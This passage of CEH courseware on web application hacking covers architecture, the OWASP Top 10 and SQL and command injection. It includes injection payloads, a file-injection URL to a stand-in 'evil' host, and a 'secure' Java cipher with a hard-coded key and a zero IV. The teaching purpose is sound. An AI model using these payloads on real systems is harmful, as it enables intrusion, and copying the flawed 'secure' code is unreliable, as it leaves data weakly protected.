Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker


Hacking Web Applications

LEARNING OBJECTIVES
LO#01: Summarize Web Application Concepts
LO#02: Demonstrate Web Application Threats
LO#03: Explain Web Application Hacking Methodology
LO#04: Explain Web API, Webhooks, and Web Shell
LO#05: Summarize the Techniques used in Web Application Security

Learning Objectives
The evolution of the Internet and web technologies, combined with rapidly increasing Internet
connectivity, has led to the emergence of a new business landscape. Web applications are an
integral component of online businesses. Everyone connected via the Internet is using various
web applications for different purposes, including online shopping, email, chats, and social
networking.
Web applications are becoming increasingly vulnerable to more sophisticated threats and
attack vectors. This module will familiarize you with various web applications and web attack
vectors as well as how to protect an organization's information resources from them. It
describes the general web application hacking methodology that most attackers use to exploit a
target system. Ethical hackers can use this methodology to assess their organization's security
against web application attacks. This module will also familiarize you with web API, webhooks,
and web shell concepts, and with how they are attacked. In addition, it discusses several tools
that are useful in different stages of web application security assessment.
At the end of this module, you will be able to:
■ Describe web application concepts
■ Perform various web application attacks
■ Describe the web application hacking methodology
■ Use different web application hacking tools
■ Explain web API, webhooks, and web shell concepts
■ Understand how to hack web applications via web API, webhooks, and web shells

Module 14 Page 1881 Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

■ Adopt countermeasures against web application attacks


■ Use different web application security testing tools


LO#01: Summarize Web Application Concepts

Web Application Concepts


This section describes the basic concepts associated with web applications vis-à-vis security
concerns: their components, how they work, their architecture, and so on. Furthermore, it
provides insights into web services and the vulnerability stack.


Introduction to Web Applications

Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, and session hijacking.

Web applications are software programs that run in web browsers and act as the interface
between users and web servers through web pages. They enable users to request, submit, and
retrieve data to and from a database over the Internet through a graphical user interface (GUI).
Users can input data via a keyboard, mouse, or touch interface, depending on the device used to
access the web application. The client side is built with browser-supported technologies such as
HTML, CSS, and JavaScript; the server side is written in general-purpose languages (e.g., PHP,
Java, C#, Python) and uses query languages such as SQL to access data in databases.
Web applications are developed as dynamic web pages, and they allow users to communicate
with servers using server-side scripts. They allow users to perform specific tasks such as
searching, sending emails, connecting with friends, online shopping, and order tracking.
Several desktop applications also rely on the Internet and on web services to function.
Entities develop various web applications to offer their services to users via the Internet.
Whenever users need to access such a service, they request it by submitting the Uniform
Resource Identifier (URI) or Uniform Resource Locator (URL) of the web application in a
browser. The browser sends this request to the server that hosts the web application; the server
returns a response, which the browser renders. Some popular web servers are Microsoft IIS,
Apache HTTP Server, H2O, LiteSpeed, Cherokee, etc.
Increasing Internet usage and expanding online businesses have accelerated the development
and ubiquity of web applications across the globe. A key factor in the adoption of web
applications for business purposes is the multitude of features that they offer. Moreover, they
are relatively easy to develop and to deploy centrally. They offer richer services than many
traditional desktop applications and are easy to install, maintain, and update. Centralized
deployment does not make them secure by default, however: the same reachability that makes
them convenient also exposes them to every attacker on the Internet.


The advantages of web applications are listed below:

■ As they are independent of the client operating system, their development and
troubleshooting are easy and cost-effective.
■ They are accessible anytime and anywhere from a computer with an Internet connection.
■ The user interface is customizable and can be updated centrally.
■ Users can access them on any device with a web browser, including smartphones and
tablets.
■ Dedicated servers, monitored and managed by experienced server administrators, store
all the web application data, so capacity is scaled on the server side rather than on every
client.
■ Hosting servers in multiple locations improves physical security and availability and
removes the burden of monitoring thousands of desktops running the program.
■ They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL
Server, .NET, and scripting languages, which are scalable and support even portable
platforms.
Although web applications enforce certain security policies, they are vulnerable to various
attacks such as SQL injection, cross-site scripting, and session hijacking.
How Web Applications Work

The main function of web applications is to fetch user-requested data from a database. When a
user clicks a link or enters a URL in a browser, the web application returns the requested
content, which the browser displays.
This mechanism involves the following steps:
■ First, the user enters the website name or URL in the browser. The browser sends the
request to the web server.
■ On receiving the request, the web server decides how to handle it, classically by file
extension (modern servers use configured handler or route mappings, but the division of
labor is the same):
o If the user requests a static page with an HTM or HTML extension, the web server
reads the file and sends it to the user's browser.
o If the user requests a page that needs to be processed at the server side, such as
php, asp, or cfm, the web server passes the request to the web application server.
■ The web application server runs the application code for that request.
■ The web application server accesses the database to perform the requested task,
retrieving or updating the stored information.
■ After processing the request, the web application server sends the results to the web
server, which in turn sends the response to the user's browser.
From a security standpoint, every value the browser supplies (URL path, query string, headers,
cookies, form fields) is attacker-controlled input to the application server and to any database
query it builds from that input.


[Figure 14.1 shows the request flow: the user submits a login form or a URL such as
http://certifiedhacker.com/?id=6329&print=Y; the request crosses the Internet and the firewall
to the web server, which hands it to the web application server running on the operating
system; the application server issues SELECT * from news where id = 6329 against the DBMS,
and the row (ID 6329, Topic Tech, News CNN) is returned as the output.]

Figure 14.1: Working of web applications
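The flow in Figure 14.1 ends in a database query built from the id parameter of the URL. The following added example (not part of the EC-Council courseware) models that flow in Python: a dispatcher that serves static .htm/.html paths directly and passes dynamic requests to application code that queries an in-memory SQLite table standing in for the DBMS. It builds the query from the figure in two ways, by string concatenation, which is the injection flaw listed later under OWASP A03, and as a validated, parameterized query, and shows what each returns when the client rewrites the id parameter. The table contents, the hostname and all function names are constructed for this example.

```python
import sqlite3
from urllib.parse import urlparse, parse_qs


def make_db():
    """Constructed sample table standing in for the DBMS in Figure 14.1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, news TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                     [(6329, "Tech", "CNN"), (6330, "Sports", "Example Wire")])
    conn.commit()
    return conn


def fetch_news_unsafe(conn, article_id):
    # The query from the figure built by concatenation: whatever the client
    # sent in ?id= becomes part of the SQL text (OWASP A03 Injection).
    sql = "SELECT id, topic, news FROM news WHERE id = " + article_id
    return conn.execute(sql).fetchall()


def fetch_news_safe(conn, article_id):
    # Validate the type first, then bind the value as a parameter so it can
    # never change the structure of the statement.
    try:
        article_id = int(article_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, topic, news FROM news WHERE id = ?", (article_id,)
    ).fetchall()


def handle_request(conn, url, safe=True):
    """Mimic the web server's dispatch: .htm/.html is served as a static file,
    anything else goes to the application layer, which queries the database."""
    parsed = urlparse(url)
    if parsed.path.endswith((".htm", ".html")):
        return ("static", parsed.path)
    params = parse_qs(parsed.query)          # decodes %20 etc. into the raw value
    if "id" not in params:
        return ("error", "missing id")
    fetch = fetch_news_safe if safe else fetch_news_unsafe
    return ("dynamic", fetch(conn, params["id"][0]))


if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "http://certifiedhacker.com/index.html"))
    print(handle_request(db, "http://certifiedhacker.com/?id=6329&print=Y"))
    # The attacker rewrites the id parameter to "6329 OR 1=1" (URL-encoded).
    tampered = "http://certifiedhacker.com/?id=6329%20OR%201%3D1"
    print(handle_request(db, tampered, safe=False))   # every row leaks
    print(handle_request(db, tampered, safe=True))    # rejected, empty result
```

The unsafe path returns both rows because the interpreter sees `WHERE id = 6329 OR 1=1`; the safe path never lets the value reach the SQL text, so the same input yields nothing. The type check is what makes the result unambiguous here; parameter binding alone is sufficient to prevent injection, but validating the expected type also stops the request earlier and gives a cleaner error.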

Web Application Architecture


Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP,
etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of
the web application depends on its architecture, which includes hardware and software that
perform tasks such as reading the request as well as searching, gathering, and displaying the
required data.
The web application architecture includes different devices, web browsers, and external web
services that work with different scripting languages to execute the web application. It consists
of three layers:
1. Client or presentation layer

2. Business logic layer


3. Database layer
The client or presentation layer includes all physical devices present on the client side, such as
laptops, smartphones, and computers. These devices feature operating systems and compatible
browsers, which enable users to send requests for required web applications. The user requests
a website by entering a URL in the browser, and the request travels to the web server. The web
server then responds to the request and fetches the requested data; the application finally
displays this response in the browser in the form of a web page.
The "business logic" layer itself consists of two layers: the web-server logic layer and the
business logic layer. The web-server logic layer contains components such as a firewall, an HTTP
request parser, a proxy caching server, an authentication and login handler, a resource handler,
and the server hardware. The firewall filters traffic before it reaches the server, the HTTP
request parser decodes requests coming from clients and returns responses to them, and the
resource handler serves many requests concurrently. The web-server logic layer contains the
code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web
Server).


The business logic layer includes the functional logic of the web application, which is
implemented using technologies such as .NET, Java, and "middleware". It defines the flow of
data, according to which the developer builds the application using programming languages. It
holds the application logic and integrates legacy applications with the latest functionality of the
application. The server needs a specific protocol to access user-requested data from its
database; this layer contains the software that defines the steps to search for and fetch the data.
The database layer consists of cloud services, a B2B layer that holds all the commercial
transactions, and a database server that supplies an organization's production data in a
structured form (e.g., MS SQL Server, MySQL server).

[Figure 14.2 shows the three layers. Presentation layer: web browsers on PCs, smartphones, and
web appliances (HTML, CSS, JavaScript). Business layer: the web server (firewall, proxy server and
cache, HTTP request parser, servlet container, resource handler and login) and the application
server (business logic in Java, C#, Ruby, PHP, Python, or JavaScript; legacy application; data
access). Database layer: the database server.]

Figure 14.2: Web Application Architecture


Web Services

A web service is an application or software component deployed over the Internet that uses standards such as SOAP, WSDL, UDDI, and REST to enable communication between applications developed for different platforms.
A web service is an application or software component that is exposed over the Internet or an
intranet. It uses standard, platform-neutral message formats and protocols (such as SOAP over
HTTP, or REST-style HTTP APIs exchanging XML or JSON) so that applications written for different
platforms can communicate; for instance, Java-based services can interact with PHP applications.
Supporting standards such as WSDL (interface description) and UDDI (discovery) complete the
SOAP-based web service stack.
Web Service Architecture

A web service architecture describes the interactions among the service provider, service
requester, and service registry. These interactions consist of three operations, namely publish,
find, and bind. All these roles and operations work together on web service artifacts known as
software modules (services) and their descriptions.
Service providers offer web services. They deploy and publish service descriptions of a web
service to a service registry. Requesters find these descriptions from the service registry and
use them to bind with the web service provider and invoke the web service implementation.
There are three roles in a web service:
■ Service Provider: The platform that hosts the service and exposes it to requesters.
■ Service Requester: An application or client that is seeking a service or trying to
establish communication with a service. In general, the browser (or another application)
acts as the requester, invoking the service on behalf of a user.
■ Service Registry: The place where the provider publishes service descriptions. The
service requester discovers the service there and retrieves binding data from the service
descriptions.


There are three operations in a web service architecture:

■ Publish: Service descriptions are published to the registry so that requesters can
discover the services.
■ Find: The requester retrieves the service descriptions. This can happen in two phases:
obtaining the service interface description at development time, and obtaining the
binding and location details at run time.
■ Bind: The requester invokes and establishes communication with the service at run
time, using the binding data inside the service descriptions to locate and call it.
There are two artifacts in a web service architecture:
■ Service: A software module offered by the service provider over the network. It
communicates with requesters. At times, it can also act as a requester, invoking other
services in its implementation.
■ Service Description: Provides the interface details and implementation details of a
service: its operations, network locations, binding details, data types, etc. It can be
stored in a registry and retrieved by the requester.


.J ta¥
~·····················································> 6
■ Bind ♦c,,,
Service Service Provider
Requester (Contains Service and
Service Descriptions)

Figure 14.3: We b Service Architecture

Characteristics of Web Services

■ XML-based: Web services use XML for data representation and transport. XML avoids
binding to a particular OS, network stack, or platform, so applications that expose web
services are highly interoperable.
■ Coarse-grained service: Web service operations are typically coarse-grained: a single
operation carries a large amount of information and performs more work than a fine-
grained method call. A coarse-grained service is usually a composition of several fine-
grained operations.


■ Loosely coupled: Web services support a loosely coupled approach for interconnecting
systems. The systems interact via the web API by exchanging XML messages; the API adds
a layer of abstraction over the infrastructure, making the connection flexible and
adaptable.
■ Asynchronous and synchronous support: In a synchronous call the client waits for the
response before continuing, whereas in an asynchronous call it does not. RPC-style
messaging is typically used for synchronous interactions and document-style messaging
for asynchronous ones. Both kinds of endpoint are commonly implemented using
servlets, SOAP/XML, and HTTP.
■ RPC support: Web services support remote procedure calls (RPC), much like traditional
distributed applications.
Types of Web Services

Web services are of two types:

■ SOAP web services

The Simple Object Access Protocol (SOAP) is an XML-based messaging protocol. It defines
the envelope format used to transfer data between the service provider and the
requester, prescribes how web services are built, and enables data exchange between
different programming languages.
■ RESTful web services

REpresentational State Transfer (REST) web services are designed around a set of
constraints that make services simpler and more scalable. They use underlying HTTP
concepts (resources identified by URLs, standard methods such as GET, POST, PUT, and
DELETE, and status codes) to define the services. REST is an architectural style rather than
a protocol like SOAP.
Components of Web Service Architecture:

■ UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that
lists the services available.
■ WSDL: Web Services Description Language (WSDL) is an XML-based language that
describes the interface, message formats, and endpoints of a web service.
■ WS-Security: Web Services Security (WS-Security) plays an important role in securing
web services. It is an extension of SOAP that provides integrity and confidentiality for
SOAP messages as well as authentication of the sender.
Other WS-* specifications, such as WS-Policy and WS-SecurityPolicy, also play a role in
communication between applications.


Vulnerability Stack

Web applications are built on, maintained through, and accessed through several layers: custom
web applications, third-party components, web servers, databases, operating systems, networks,
and security devices. The mechanisms and services employed at each layer together determine
whether users can access the web application securely. Organizations treat web application
security as critical because web applications are a major attack target. The vulnerability stack
shows these layers and the corresponding elements, mechanisms, and services whose
weaknesses make web applications vulnerable.

Layer 7  Custom Web Applications    Business Logic Flaws / Technical Vulnerabilities
Layer 6  Third-party Components     Open Source / Commercial
Layer 5  Web Server                 Apache / Microsoft IIS
Layer 4  Database                   Oracle / MySQL / MS SQL
Layer 3  Operating System           Windows / Linux / macOS
Layer 2  Network                    Router / Switch
Layer 1  Security                   IPS / IDS

Figure 14.4: Vulnerability Stack


Attackers exploit vulnerabilities in one or more elements among the seven layers to gain
unrestricted access to an application or to the entire network.
■ Layer 7

If an attacker finds vulnerabilities in the custom application code or its business logic
(implemented using languages such as .NET and Java), he/she can exploit them, for
example through input validation attacks such as XSS and SQL injection, or by abusing
the intended workflow (business logic flaws).
■ Layer 6

Third-party components are services and libraries that integrate with the website to
provide certain functionality (e.g., Amazon.com is the target's main website, and the
payment gateway it hands checkout to is a third-party site).
When customers choose a product to buy, they click the Buy/Checkout button, which
redirects them through a payment gateway to their online banking account. Attackers
might exploit such redirection, or a vulnerability in the third-party component itself, as a
pathway into the main website.
■ Layer 5

Web servers are software programs that host websites. When users access a website,
they send a URL request to the web server. The server parses this request and responds
with a web page that appears in the browser. Attackers can perform footprinting on the
web server that hosts the target website and grab banners that contain information
such as the web server name and its version. They can also use tools such as Nmap to
gather such information. Then, they might search the CVE database for published
vulnerabilities affecting that particular web server or service version and exploit any
that they find.
■ Layer 4

Databases store sensitive user information such as user IDs, passwords, phone numbers,
and other particulars. Vulnerabilities in the database of the target website, or injection
flaws in the application that reach it, can be exploited by attackers using tools such as
sqlmap to gain control of the target's database.
■ Layer 3

Attackers scan the operating system to find open ports and vulnerable services, and
they develop or obtain malware/backdoors to exploit them. Malware delivered through
an exposed service compromises the machine and gives them control over it. Later, they
pivot to the databases of the target website.
■ Layer 2

Switches forward traffic only to the port where the destination MAC address was
learned. Attackers flood a switch with frames from bogus source addresses until its CAM
table is exhausted and it falls back to flooding frames out of every port like a hub. They
can then sniff traffic to the target website, which can include credentials or other
personal information.


■ Layer 1

IDS and IPS raise alarms if any malicious traffic enters a target machine or server.
Attackers adopt evasion techniques to circumvent such systems so that they do not
trigger any alarm while exploiting the target.


LO#02: Demonstrate Web Application Threats

Web Application Threats


Attackers attempt various application-level attacks to compromise the security of web
applications to commit fraud or steal sensitive information. This section discusses the various
types of threats and attacks against the vulnerabilities of web applications.


OWASP Top 10 Application Security Risks - 2021

A01 Broken Access Control
A02 Cryptographic Failures
A03 Injection
A04 Insecure Design
A05 Security Misconfiguration
A06 Vulnerable and Outdated Components
A07 Identification and Authentication Failures
A08 Software and Data Integrity Failures
A09 Security Logging and Monitoring Failures
A10 Server-Side Request Forgery (SSRF)

Source: https://owasp.org
OWASP is an international non-profit organization that publishes the OWASP Top 10, a
consensus list of the most critical security risks to web applications. The 2021 edition lists the
following risks.
■ A01 - Broken Access Control

This risk relates to improperly enforced restrictions on what authenticated users are
allowed to do. Attackers can exploit these flaws to access unauthorized functionality
and/or data: viewing other users' accounts or sensitive files, modifying other users' data,
or changing access rights.
■ A02 - Cryptographic Failures

Many web applications and APIs do not properly protect sensitive data, such as financial
data, healthcare data, and personally identifiable information (PII). Developers may use
weak or outdated algorithms, hard-coded or old keys, or fail to enforce proper key
management, or they may transmit sensitive data in cleartext over HTTP. Attackers can
leverage such flaws to steal or modify weakly protected data and commit credit-card
fraud, identity theft, or other crimes. Sensitive data require extra protection such as
encryption at rest and in transit, as well as special precautions when exchanged with a
browser.
■ A03 - Injection

Injection flaws, such as SQL, NoSQL, OS command, and LDAP injection, occur when
untrusted data are sent to an interpreter as part of a command or query. The attacker's
hostile data can trick the interpreter into executing unintended commands or accessing
data without proper authorization. Cross-site scripting (XSS) is also classified as injection
in the 2021 list.
■ A04 - Insecure Design

Insecure design covers weaknesses that arise when security requirements and controls
are not considered during the design phase, for example when threat modeling, secure
design patterns, and reference architectures are skipped or business risks are not kept up
to date. Such flaws can compromise the integrity, confidentiality, and authenticity of
data. Unlike implementation bugs, a design flaw cannot be fixed by a perfect
implementation, because the needed control was never specified; examples include
missing rate limits on sensitive workflows and account recovery based on guessable
questions and answers.
■ A05 - Security Misconfiguration

Security misconfiguration is the most common issue in web security, due in part to
manual or ad hoc configuration (or no configuration at all); insecure default
configurations; open S3 buckets; misconfigured HTTP headers; error messages
containing sensitive information; and failure to patch or upgrade systems, frameworks,
dependencies, and components in a timely manner (or at all).
XML External Entity (XXE) processing is also classified here in the 2021 list. Many older
or poorly configured XML processors evaluate external entity references within XML
documents. External entities can be used to disclose internal files via the file:// URI
handler, to reach internal SMB file shares on unpatched Windows servers, to perform
internal port scanning, to achieve remote code execution, or to cause DoS, as in the
billion laughs attack.
■ A06 - Vulnerable and Outdated Components

Components such as libraries, frameworks, and other software modules run with the
same privileges as the application. They need to be updated or patched in a timely
manner based on the current risks; otherwise, they leave serious vulnerabilities in place
as they become outdated. An attack exploiting a vulnerable component can cause
serious data loss or server takeover. Applications and APIs using components with known
vulnerabilities may undermine application defenses and enable various attacks and
impacts.
■ A07 - Identification and Authentication Failures

Application functions related to identification, authentication, and session management
are often implemented incorrectly, allowing attackers to launch brute-forcing, password
spraying, and other automated attacks to compromise passwords, keys, or session
tokens, or to exploit other implementation flaws to assume the identities of other users
(temporarily or permanently).
■ A08 - Software and Data Integrity Failures

Many applications implement auto-update features that download updates from sources
that are not authenticated or whose integrity is not verified. Attackers can take
advantage of this to push their own updates and distribute malware. The same category
covers CI/CD pipelines and dependencies pulled from untrusted sources without integrity
verification, and insecure deserialization: if serialized objects are accepted from
untrusted sources without an integrity check, attackers can tamper with them to alter
application data or execute code.


■ A09 - Security Logging and Monitoring Failures

Security logging and monitoring failures include auditable events such as logins, failed
logins, and high-value transactions that are not logged; warnings and errors that
generate no, inadequate, or unclear log messages; logs that are stored only locally and
are not monitored for suspicious activity; and alerting thresholds and response
escalation that are missing or ineffective. Without detection and response, attackers can
compromise a system or account, tamper with credentials, or extract or destroy data
while remaining unnoticed.
■ A10 - Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF) arises when an application fetches a remote resource
from a URL supplied by the user without validating it. Attackers leverage this to make
the server issue requests on their behalf: to read or modify internal resources, to reach
cloud metadata endpoints and other internal systems that are otherwise shielded by
firewalls, network ACLs, or VPNs, and to exfiltrate sensitive information.

A01 - Broken Access Control


Access control refers to how a web application grants access to create, update, and delete any
record/content or function to some privileged users while restricting access to other users.
Broken access control is a method by which an attacker identifies a flaw related to access
control, bypasses the authentication, and then compromises the network. Access control
weaknesses are common because of the lack of automated detection and effective functional
testing by application developers. They allow attackers to act as users or administrators with
privileged functions and create, access, update, or delete any record.
According to the OWASP 2021 R3 revision, the common vulnerabilities associated with access
control are as follows:
■ Violating the principle of least privilege or deny by default, so that everyone gains access
to roles, users, or capabilities instead of only those specifically granted.
■ Evading access-control checks by modifying the URL, an API request, an HTML page,
or the application state via parameter tampering, forced browsing, or an attack tool.
■ Gaining permission to view or modify someone else's account by supplying its unique
identifier.
■ Accessing APIs that lack access controls for PUT, POST, and DELETE.
■ Escalating privileges, so that a user can act as an administrator after logging in.
■ Manipulating metadata; for example, tampering with a hidden field or altering a
JSON Web Token (JWT) access-control token or a cookie to exploit JWT invalidation or
elevate privileges.

■ Accessing APIs from illegitimate origins by exploiting a cross-origin resource sharing
(CORS) misconfiguration.
■ Force browsing to authenticated pages as an unauthenticated user, or to privileged
pages as a standard user.

Figure 14.5: Broken access-control attack (a request from privileged users passes the web
application's access control and is granted; requests from other users are denied)

A02 - Cryptographic Failures/Sensitive Data Exposure


Web applications need to store sensitive information such as passwords, credit-card numbers,
account records, and other authentication information in a database or on a file system. If the
proper security of these storage locations is not maintained, the application is at risk, as
attackers can access the storage and misuse the information.
Many web applications do not properly protect their sensitive data from unauthorized users.
Web applications use cryptographic algorithms to encrypt data and other sensitive information
that they need to transfer from the server to the client or vice versa. Sensitive data exposure
occurs because of flaws such as insecure cryptographic storage and information leakage.
Although the data are encrypted, some cryptographic encryption methods have inherent
weaknesses that allow attackers to exploit and steal the data. When an application uses poorly
written encryption code to encrypt and store sensitive data in a database, the attacker can
easily exploit this flaw to steal or modify weakly protected sensitive data such as credit-card
numbers, SSNs, and other authentication credentials. Thus, they can launch further attacks
such as identity theft and credit-card fraud.
Developers can avoid such attacks by using strong algorithms to encrypt sensitive data. At the
same time, developers must take precautions to store cryptographic keys securely. If these keys
are stored in insecure locations, attackers can retrieve them easily and decrypt the sensitive
data. The insecure storage of keys, certificates, and passwords also allows the attacker to gain
access to the web application as a legitimate user. Furthermore, developers must check the
randomness of the initialization vectors (IVs) used in the encryption algorithms. Developers
should ensure that IVs are not reused and are generated using secure cipher modes of
operation. Moreover, developers must avoid using deprecated hash functions such as MD5 and
SHA-1 and deprecated padding methods such as PKCS 1/1.5. Cryptographic failures can cause
severe losses to a company. Hence, organizations must protect all their resources such as
systems or other network resources from information leakage by employing proper content-
filtering mechanisms. Additionally, organizations should ensure that cryptographic error
messages and side-channel information do not leave any clue for exploitation.
The code listings below show poorly encrypted vulnerable code and secure code that encrypts
properly using a secure cryptographic algorithm, respectively.

Vulnerable Code
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public String encrypt(String plainText) {
    // "Encryption" by letter substitution (a->z, b->y) followed by Base64 encoding:
    // trivially reversible and not cryptography at all
    plainText = plainText.replace("a", "z");
    plainText = plainText.replace("b", "y");
    return Base64.getEncoder().encodeToString(plainText.getBytes(StandardCharsets.UTF_8));
}

Figure 14.6: Vulnerable code example

Secure Code
import java.nio.charset.StandardCharsets;
import java.security.spec.KeySpec;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

private static String sKey = "zoooooooooom!!!!";
private static String salt = "ooohhhhhhhhhhh!!!!";

public static String encrypt(String plainText) throws Exception {
    // Note: a fixed all-zero IV is shown here; the text above calls for a fresh,
    // randomly generated IV for every encryption
    byte[] iv = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    IvParameterSpec ivspec = new IvParameterSpec(iv);
    // Derive a 256-bit AES key from the passphrase with PBKDF2-HMAC-SHA256 (65536 iterations)
    SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
    KeySpec keySpec = new PBEKeySpec(sKey.toCharArray(), salt.getBytes(StandardCharsets.UTF_8),
            65536, 256);
    SecretKey key = factory.generateSecret(keySpec);
    SecretKeySpec secretKey = new SecretKeySpec(key.getEncoded(), "AES");
    // AES in CBC mode with PKCS#5 padding
    Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivspec);
    byte[] utf8text = plainText.getBytes(StandardCharsets.UTF_8);
    byte[] encryptedText = cipher.doFinal(utf8text);
    return Base64.getEncoder().encodeToString(encryptedText);
}

Figure 14.7: Secure code example

A03 - Injection Flaws


Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted
and executed as part of a command or query. Attackers exploit injection flaws by constructing
malicious commands or queries that result in data loss or corruption, lack of accountability, or
denial of access. Such flaws are prevalent in legacy code and often found in SQL, LDAP, and
XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers.
Attackers inject malicious code, commands, or scripts into the input fields of flawed web
applications so that the applications interpret and run the newly supplied malicious input,
which in turn allows them to extract sensitive information. By exploiting injection flaws in web
applications, attackers can easily read, write, delete, and update any data (i.e., relevant or
irrelevant to that particular application). There are many types of injection flaws, some of which
are discussed below:
■ SQL Injection: SQL injection is the most common website vulnerability on the Internet,
and it is used to take advantage of non-validated input vulnerabilities to pass SQL
commands through a web application for execution by a backend database. In this
technique, the attacker injects malicious SQL queries into the user input form either to
gain unauthorized access to a database or to retrieve information directly from the
database.
■ Command Injection: Attackers identify an input validation flaw in an application and
exploit the vulnerability by injecting a malicious command into the application to execute
arbitrary commands on the host operating system. Such flaws are therefore extremely
dangerous.
■ LDAP Injection: LDAP injection is an attack method in which websites that construct
LDAP statements from user-supplied input are exploited for launching attacks. When an
application fails to sanitize the user input, the attacker modifies the LDAP statement
with the help of a local proxy. This, in turn, results in the execution of arbitrary
commands such as granting access to unauthorized queries and altering the content
inside the LDAP tree.
■ Cross-Site Scripting (XSS): XSS flaws occur when an application includes untrusted data
in a new web page without proper validation or escaping, or when an application
updates an existing web page with user-supplied data using a browser API that can
create JavaScript. XSS allows attackers to inject and execute scripts in the victim's
browser, which can hijack user sessions, deface websites, or redirect the user to
malicious sites.

SQL Injection Attacks


SQL injection attacks use a series of malicious SQL queries or SQL statements to directly
manipulate the database. Applications often use SQL statements to authenticate users, validate
roles and access levels, store and retrieve information for the application and user, and link to
other data sources. SQL injection attacks work because the application does not properly
validate the input before passing it to an SQL statement. For example, consider the following
SQL statement:
SELECT * FROM tablename WHERE UserID=2302
which becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID=2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE" for every row, often allowing the
enumeration of all user ID values from the database. An attacker uses a vulnerable web
application to bypass normal security measures and obtain direct access to valuable data.
Attackers carry out SQL injection attacks from the web browser's address bar, form fields,
queries, searches, and so on.
SQL injection attacks allow attackers to
■ Log into the application without supplying valid credentials
■ Perform queries against data in the database, often even data to which the application
would not normally have access
■ Modify database contents or drop the database altogether
■ Use the trust relationships established between the web application components to
access other databases
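The UserID example above, worked through against an in-memory SQLite table (an added example, not part of the module; the table rows are constructed sample data): the concatenated query returns every row for the input 2302 OR 1=1, whereas the same input bound as a parameter matches nothing, because the driver treats it as one opaque value rather than as SQL.

```python
import sqlite3

# Constructed sample rows (not from the module); 2302 is the UserID used in the text.
SAMPLE_USERS = [(2301, "alice"), (2302, "bob"), (2303, "carol")]


def make_db():
    """Create an in-memory database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tablename (UserID INTEGER, Name TEXT)")
    conn.executemany("INSERT INTO tablename VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable: the request value is pasted into the statement text, so
    '2302 OR 1=1' turns the WHERE clause into a tautology."""
    sql = "SELECT * FROM tablename WHERE UserID=" + user_id
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """Hardened: the value is bound as a parameter. The statement text is fixed, and
    the bound string is compared with the INTEGER column as a single value;
    '2302 OR 1=1' is not a number, so it matches no row at all."""
    return conn.execute("SELECT * FROM tablename WHERE UserID=?", (user_id,)).fetchall()


def row_counts(request_value):
    """(rows returned by the vulnerable variant, rows returned by the hardened variant)
    for the same request value."""
    conn = make_db()
    try:
        return len(lookup_concat(conn, request_value)), len(lookup_param(conn, request_value))
    finally:
        conn.close()
```

Parameter binding is what makes the input inert; real code should additionally reject non-integer identifiers before the query runs.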

Attacker input (submitted in the message field): '); DROP TABLE Messages; --
When this code is sent to the database server, it drops the Messages table.

SQL Injection vulnerable server code:
<?php
function save_email($user, $message)
{
    $sql = "INSERT INTO Messages (
        user, message
    ) VALUES (
        '$user',
        '$message'
    )";
    return mysql_query($sql);
}
?>

Figure 14.8: SQL Injection attack

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15:
SQL Injection.

Command Injection Attacks


Command injection flaws allow attackers to pass malicious code to different systems via web
applications. The attacks include calls to the operating system via system calls, the use of
external programs via shell commands, and calls to backend databases via SQL. Poorly designed
web applications may accept and execute inserted scripts written in Perl, Python, and other
languages. If a web application uses any type of interpreter, attackers can insert malicious code
to inflict damage.
To perform various functions, web applications must use operating system features and
external programs. Many programs are invoked externally; a frequently used one is the
sendmail program. An application must carefully scrub any piece of information taken from an
HTTP request before passing it to an external program. Otherwise, attackers can insert special
characters, malicious commands, and command modifiers into the information, and the web
application then blindly passes these characters to the external system for execution. Inserting
SQL commands, another command injection method, is a dangerous and rather widespread
practice. Command injection attacks are easy to carry out and discover, but they are difficult to
understand.
The following are some types of command injection attacks:
■ Shell Injection
o An attacker tries to craft an input string to gain shell access to a web server
o Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(),
System.Diagnostics.Process.Start(), and similar APIs

■ HTML Embedding
o This type of attack is used to deface websites virtually. Using this attack, an attacker
adds extra HTML-based content to the vulnerable web application
o In an HTML embedding attack, the user input to a web script is placed into the
output HTML without being checked for HTML code or scripting
■ File Injection
o The attacker exploits this vulnerability and injects malicious code into system files
http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evil/exploit?

Command Injection Example


An attacker enters the following malicious code (account number) with a new password:
www.certifiedhacker.com/banner.gif||newpassword||1036|60|468
The last two sets of numbers denote the banner size. Once the attacker clicks the submit
button, the password for the account 1036 is changed to "newpassword." The server script
